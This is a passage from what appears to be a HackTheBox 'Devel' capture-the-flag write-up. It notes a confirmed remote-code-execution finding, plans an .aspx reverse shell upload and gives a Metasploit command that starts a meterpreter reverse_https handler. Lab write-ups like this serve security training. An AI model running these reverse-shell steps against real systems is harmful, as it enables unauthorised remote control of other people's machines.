magicrc/ctf-writeups/HTB/Devel/Devel.md

 EOF
 ```

 Our probe shows that `Target is vulnerable to RCE`.
 We could use this vulnerability to upload `.aspx` reverse shell.

-# Attack vector
 Let's start Metasploit `multi/handler` with `windows/meterpreter/reverse_https` payload.
 ```
 msfconsole -q -x "use exploit/multi/handler; set LHOST tun0; set LPORT 4444; set payload windows/meterpreter/reverse_https; run"
 ```